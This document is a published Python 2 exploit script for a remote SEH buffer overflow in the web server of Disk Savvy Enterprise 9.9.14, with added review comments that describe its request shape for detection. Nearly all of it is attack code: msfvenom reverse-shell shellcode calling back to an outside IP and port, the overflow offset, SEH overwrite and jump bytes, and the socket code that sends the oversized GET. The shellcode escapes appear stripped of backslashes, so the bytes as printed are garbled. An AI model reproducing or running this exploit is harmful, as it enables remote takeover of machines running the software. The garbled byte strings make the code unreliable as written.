
Disk Savvy Enterprise 9.9.14 Buffer Overflow

Posted on 29 August 2017

#!/usr/bin/env python
# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.disksavvy.com
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save
#
# NOTE(review): this is a Python 2 script (print statements, str-based
# socket I/O). It sends one oversized HTTP GET to the product's optional
# built-in web server; the request shape is documented below so that the
# traffic can be recognised and the listener treated as exposed attack
# surface. The affected component is the web server enabled under
# Options --> Server, which is off unless an administrator turns it on.
import socket,sys

# Destination of the single request. The port is whatever was configured
# for the web server in the reproduction steps above (8080 in this script).
target = "127.0.0.1"
port = 8080

# Encoded payload, generated with the msfvenom command in the next comment
# (x86/alpha_mixed encoder). It sits at the very start of the request path.
#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf = ""
buf += "x89xe3xdaxdexd9x73xf4x5bx53x59x49x49x49"
buf += "x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += "x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += "x58x50x38x41x42x75x4ax49x4bx4cx4dx38x6d"
buf += "x52x35x50x37x70x65x50x71x70x6bx39x4dx35"
buf += "x70x31x4bx70x63x54x6cx4bx56x30x76x50x4c"
buf += "x4bx63x62x76x6cx4cx4bx50x52x76x74x4cx4b"
buf += "x42x52x36x48x34x4fx58x37x51x5ax37x56x46"
buf += "x51x79x6fx6ex4cx55x6cx31x71x51x6cx67x72"
buf += "x34x6cx51x30x59x51x48x4fx36x6dx65x51x79"
buf += "x57x59x72x6bx42x72x72x72x77x4cx4bx52x72"
buf += "x76x70x6cx4bx61x5ax77x4cx6ex6bx42x6cx66"
buf += "x71x50x78x6ax43x32x68x75x51x6bx61x36x31"
buf += "x4ex6bx70x59x47x50x75x51x7ax73x4cx4bx30"
buf += "x49x66x78x79x73x64x7ax73x79x6cx4bx45x64"
buf += "x4cx4bx36x61x7ax76x50x31x6bx4fx4ex4cx4f"
buf += "x31x7ax6fx36x6dx43x31x39x57x74x78x6bx50"
buf += "x31x65x6bx46x43x33x53x4dx68x78x77x4bx33"
buf += "x4dx31x34x44x35x78x64x56x38x6ex6bx36x38"
buf += "x75x74x56x61x78x53x65x36x4ex6bx66x6cx30"
buf += "x4bx6ex6bx33x68x65x4cx63x31x68x53x6cx4b"
buf += "x65x54x4ex6bx33x31x58x50x6ex69x43x74x31"
buf += "x34x65x74x53x6bx71x4bx71x71x46x39x72x7a"
buf += "x53x61x39x6fx49x70x43x6fx61x4fx61x4ax4e"
buf += "x6bx44x52x78x6bx6ex6dx33x6dx33x58x75x63"
buf += "x50x32x35x50x37x70x32x48x54x37x70x73x34"
buf += "x72x63x6fx66x34x62x48x52x6cx52x57x44x66"
buf += "x43x37x39x6fx79x45x4cx78x4ex70x43x31x45"
buf += "x50x57x70x34x69x6fx34x51x44x70x50x53x58"
buf += "x76x49x6fx70x50x6bx33x30x79x6fx5ax75x50"
buf += "x50x46x30x42x70x46x30x51x50x62x70x67x30"
buf += "x70x50x30x68x79x7ax56x6fx69x4fx49x70x69"
buf += "x6fx48x55x6fx67x52x4ax36x65x75x38x68x39"
buf += "x33x6cx6bx6fx74x38x52x48x43x32x57x70x44"
buf += "x51x71x4bx4cx49x4bx56x31x7ax72x30x56x36"
buf += "x50x57x63x58x6dx49x6dx75x34x34x63x51x79"
buf += "x6fx4bx65x6cx45x6bx70x43x44x36x6cx69x6f"
buf += "x72x6ex76x68x52x55x48x6cx52x48x78x70x6c"
buf += "x75x6fx52x52x76x4bx4fx4ex35x42x48x43x53"
buf += "x50x6dx35x34x63x30x6ex69x4dx33x62x77x43"
buf += "x67x56x37x75x61x39x66x42x4ax62x32x31x49"
buf += "x70x56x69x72x39x6dx72x46x59x57x51x54x45"
buf += "x74x77x4cx33x31x46x61x4ex6dx37x34x57x54"
buf += "x56x70x68x46x47x70x62x64x36x34x46x30x61"
buf += "x46x36x36x62x76x70x46x72x76x32x6ex61x46"
buf += "x30x56x56x33x70x56x73x58x53x49x48x4cx55"
buf += "x6fx4fx76x49x6fx4ax75x4fx79x39x70x52x6e"
buf += "x72x76x37x36x4bx4fx56x50x61x78x65x58x4e"
buf += "x67x57x6dx75x30x39x6fx59x45x6fx4bx78x70"
buf += "x4dx65x4ex42x71x46x71x78x6ex46x6cx55x4f"
buf += "x4dx6fx6dx79x6fx59x45x35x6cx53x36x53x4c"
buf += "x54x4ax4dx50x6bx4bx4bx50x54x35x65x55x6d"
buf += "x6bx63x77x55x43x43x42x32x4fx63x5ax43x30"
buf += "x72x73x4bx4fx48x55x41x41"

# Buffer layout, as stated by the author's line comments: encoded payload,
# 'A' filler up to the 2492-byte offset, a 4-byte nSEH record, a 4-byte SEH
# handler address (the author attributes it to libpal.dll), a 10-byte NOP
# sled, a 5-byte backward jump, then 'D' filler out to exactly 5000 bytes.
# The constant total length (5000) is a useful characteristic for a
# request-length rule on the web server port.
payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492 - len(payload)) # Padding after shellcode till the offset value
payload += 'xEBx10x90x90' # NSEH, a short jump of 10 bytes
payload += 'xDDxADx13x10' # SEH : POP EDI POP ESI RET 04 libpal.dll
payload += 'x90' * 10 # NOPsled
payload += 'xE9x25xBFxFFxFF' # Second JMP to ShellCode
payload += 'D' * (5000-len(payload)) # Additional Padding

# One plain TCP connection to the web server; nothing is read back, so
# the script cannot tell whether the request had any effect.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
# NOTE(review): a bare except also swallows KeyboardInterrupt/SystemExit;
# socket.error is the condition this branch is actually written for.
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)

# Request shape for detection: a GET whose path starts with "/../" followed
# by the ~5000-byte buffer, and three fixed headers whose literal values
# (Host: 4.2.2.2, Connection: keep-alive, Referer: http://pyramidcyber.com)
# do not depend on the target. An HTTP request line of this length on a
# Disk Savvy web-server port is the primary signature; the constant
# Host/Referer values distinguish this particular script.
packet = "GET /../%s HTTP/1.1 " %payload # Request & Headers
packet += "Host: 4.2.2.2 "
packet += "Connection: keep-alive "
packet += "Referer: http://pyramidcyber.com "
packet += " "
s.send(packet)
s.close()

 
